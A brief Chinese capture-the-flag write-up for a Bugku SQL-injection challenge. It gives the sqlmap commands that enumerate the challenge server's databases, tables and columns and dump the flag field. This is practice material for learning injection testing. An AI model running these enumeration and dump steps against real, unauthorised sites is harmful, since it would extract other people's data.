BUGKU成绩单
没有任何过滤 非常友好
题目地址 :http://123.206.87.240:8002/chengjidan/
按照题目提示输入123分别的到不同的人的成绩单
4以后出现空白,由此可以推测有4列
基本到这里就是典型的sql注入题了
打开BP firefox浏览器调节代理
BP抓包发现是POST传值
关闭代理,关闭BP
上sqlmap注入
python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms --dbs
发现两个库
第一个information_schema存在flag的概率很低
直接看第二个库skctf_flag
go ahead !!!
python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag --tables
WOW ~ two tables
go on
python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag -T fl4g -columns
最后爆字段
python sqlmap.py -u "http://123.206.87.240:8002/chengjidan/index.php" --forms -D skctf_flag -T fl4g -C skctf_flag --dump
flag 到手
GG